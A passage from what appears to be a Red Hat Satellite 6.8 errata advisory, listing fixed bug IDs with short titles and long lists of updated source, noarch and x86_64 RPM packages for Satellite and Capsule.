1878194 - In Capsule upgrade, "yum update" dump some error messages.
1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled
1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections
1878850 - creating host from hg doesn't resolves the user-data template
1879151 - Remote execution status not updating with large number of hosts
1879448 - Add hits details to host details page
1879451 - Stop uploading if Satellite's setting is disconnected
1879453 - Add plugin version to report metadata
1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP
1880637 - [6.8] satellite-installer always runs upgrade steps
1881066 - Safemode doesn't allow to access 'host_cores' on #
1881078 - Use Passenger instead of Puma as the Foreman application server
1881988 - [RFE] IPv6 support for Satellite 6.8
1882276 - Satellite installation fails at execution of '/usr/sbin/foreman-rake -- config -k 'remote_execution_cockpit_url' -v '/webcon/=%{host}''
1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results
1883093 - installer-upgrade failed with error "Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)"
1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error "HTTP error (500 - Internal Server Error): Unable to register system, not all services available"
1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals
1887489 - Insights rules can't be loaded on freshly installed Satellite system
1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO
- Package List:
Red Hat Satellite Capsule 6.8:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm
noarch: ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm ansible-runner-1.4.6-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm crane-selinux-3.4.0-1.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-debug-2.1.2.19-1.el7sat.noarch.rpm foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm foreman-installer-2.1.2.8-1.el7sat.noarch.rpm foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm foreman-proxy-2.1.2-2.el7sat.noarch.rpm foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm katello-certs-tools-2.7.1-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm katello-common-3.16.0-1.el7sat.noarch.rpm katello-debug-3.16.0-1.el7sat.noarch.rpm kobo-0.5.1-1.el7sat.noarch.rpm pulp-admin-client-2.21.3-1.el7sat.noarch.rpm pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-nodes-child-2.21.3-1.el7sat.noarch.rpm pulp-nodes-common-2.21.3-1.el7sat.noarch.rpm pulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm python-pymongo-3.2-2.el7sat.x86_64.rpm python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm python-qpid-proton-0.28.0-3.el7.x86_64.rpm python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm python-saslwrapper-0.22-5.el7sat.x86_64.rpm python-simplejson-3.2.0-1.el7sat.x86_64.rpm python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm python-zope-interface-4.0.5-4.el7.x86_64.rpm python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm python2-gobject-3.28.3-2.el7sat.x86_64.rpm python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm python2-markupsafe-0.23-21.el7sat.x86_64.rpm python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm python2-twisted-16.4.1-12.el7sat.x86_64.rpm qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm qpid-proton-c-0.28.0-3.el7.x86_64.rpm qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm qpid-qmf-1.36.0-28.el7amq.x86_64.rpm rubygem-newt-0.9.6-3.el7sat.x86_64.rpm rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm saslwrapper-0.22-5.el7sat.x86_64.rpm saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
Red Hat Satellite 6.7:
Source: ansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm ansible-runner-1.4.6-1.el7ar.src.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm ansiblerole-insights-client-1.7.1-1.el7sat.src.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm candlepin-3.1.21-1.el7sat.src.rpm createrepo_c-0.7.4-1.el7sat.src.rpm foreman-2.1.2.19-1.el7sat.src.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.src.rpm foreman-discovery-image-3.6.7-1.el7sat.src.rpm foreman-discovery-image-service-1.0.0-3.el7sat.src.rpm foreman-installer-2.1.2.8-1.el7sat.src.rpm foreman-proxy-2.1.2-2.el7sat.src.rpm foreman-selinux-2.1.2.3-1.el7sat.src.rpm future-0.16.0-11.el7sat.src.rpm gofer-2.12.5-7.el7sat.src.rpm hfsplus-tools-332.14-12.el7.src.rpm katello-3.16.0-1.el7sat.src.rpm katello-certs-tools-2.7.1-1.el7sat.src.rpm katello-client-bootstrap-1.7.5-1.el7sat.src.rpm katello-selinux-3.4.0-1.el7sat.src.rpm keycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm kobo-0.5.1-1.el7sat.src.rpm libmodulemd-1.7.0-1.pulp.el7sat.src.rpm libsolv-0.7.4-4.pulp.el7sat.src.rpm libwebsockets-2.4.2-2.el7.src.rpm livecd-tools-20.4-1.6.el7sat.src.rpm mod_xsendfile-0.12-11.el7sat.src.rpm ostree-2017.1-2.atomic.el7.src.rpm pcp-mmvstatsd-0.4-2.el7sat.src.rpm pulp-2.21.3-1.el7sat.src.rpm pulp-docker-3.2.7-1.el7sat.src.rpm pulp-katello-1.0.3-1.el7sat.src.rpm pulp-ostree-1.3.1-2.el7sat.src.rpm pulp-puppet-2.21.3-2.el7sat.src.rpm pulp-rpm-2.21.3-2.el7sat.src.rpm puppet-agent-6.14.0-2.el7sat.src.rpm puppet-agent-oauth-0.5.1-3.el7sat.src.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm puppetlabs-stdlib-4.25.1-2.el7sat.src.rpm puppetserver-6.13.0-1.el7sat.src.rpm pycairo-1.16.3-9.el7sat.src.rpm pygobject3-3.28.3-2.el7sat.src.rpm python-aiohttp-3.6.2-4.el7ar.src.rpm python-amqp-2.2.2-5.el7sat.src.rpm python-anyjson-0.3.3-11.el7sat.src.rpm python-apypie-0.2.2-1.el7sat.src.rpm python-async-timeout-3.0.1-2.el7ar.src.rpm python-attrs-19.3.0-3.el7ar.src.rpm python-billiard-3.5.0.3-3.el7sat.src.rpm python-blinker-1.3-2.el7sat.src.rpm python-celery-4.0.2-9.el7sat.src.rpm python-chardet-3.0.4-10.el7ar.src.rpm python-click-6.7-9.el7sat.src.rpm python-crane-3.3.1-9.el7sat.src.rpm python-daemon-2.1.2-7.el7at.src.rpm python-dateutil-2.8.1-2.el7ar.src.rpm python-django-1.11.29-1.el7sat.src.rpm python-flask-0.12.2-4.el7sat.src.rpm python-gnupg-0.3.7-1.el7ui.src.rpm python-idna-2.4-2.el7ar.src.rpm python-idna-ssl-1.1.0-2.el7ar.src.rpm python-isodate-0.5.4-12.el7sat.src.rpm python-itsdangerous-0.24-15.el7sat.src.rpm python-jinja2-2.10-10.el7sat.src.rpm python-jmespath-0.9.0-6.el7_7.src.rpm python-kid-0.9.6-11.el7sat.src.rpm python-kombu-4.0.2-13.el7sat.src.rpm python-lockfile-0.11.0-10.el7ar.src.rpm python-markupsafe-0.23-21.el7sat.src.rpm python-mongoengine-0.10.5-2.el7sat.src.rpm python-multidict-4.7.4-2.el7ar.src.rpm python-nectar-1.6.2-1.el7sat.src.rpm python-oauth2-1.5.211-8.el7sat.src.rpm python-okaara-1.0.37-2.el7sat.src.rpm python-pexpect-4.6-1.el7at.src.rpm python-prometheus-client-0.7.1-2.el7ar.src.rpm python-psutil-5.0.1-3.el7sat.src.rpm python-ptyprocess-0.5.2-3.el7at.src.rpm python-pycurl-7.43.0.2-4.el7sat.src.rpm python-pymongo-3.2-2.el7sat.src.rpm python-qpid-1.35.0-5.el7.src.rpm python-receptor-satellite-1.2.0-1.el7sat.src.rpm python-semantic_version-2.2.0-6.el7sat.src.rpm python-simplejson-3.2.0-1.el7sat.src.rpm python-six-1.11.0-8.el7ar.src.rpm python-twisted-16.4.1-12.el7sat.src.rpm python-typing-extensions-3.7.4.1-2.el7ar.src.rpm python-vine-1.1.3-6.el7sat.src.rpm python-werkzeug-0.12.2-5.el7sat.src.rpm python-yarl-1.4.2-2.el7ar.src.rpm python-zope-interface-4.0.5-4.el7.src.rpm qpid-cpp-1.36.0-28.el7amq.src.rpm qpid-dispatch-1.5.0-4.el7.src.rpm qpid-proton-0.28.0-3.el7.src.rpm receptor-0.6.3-1.el7ar.src.rpm 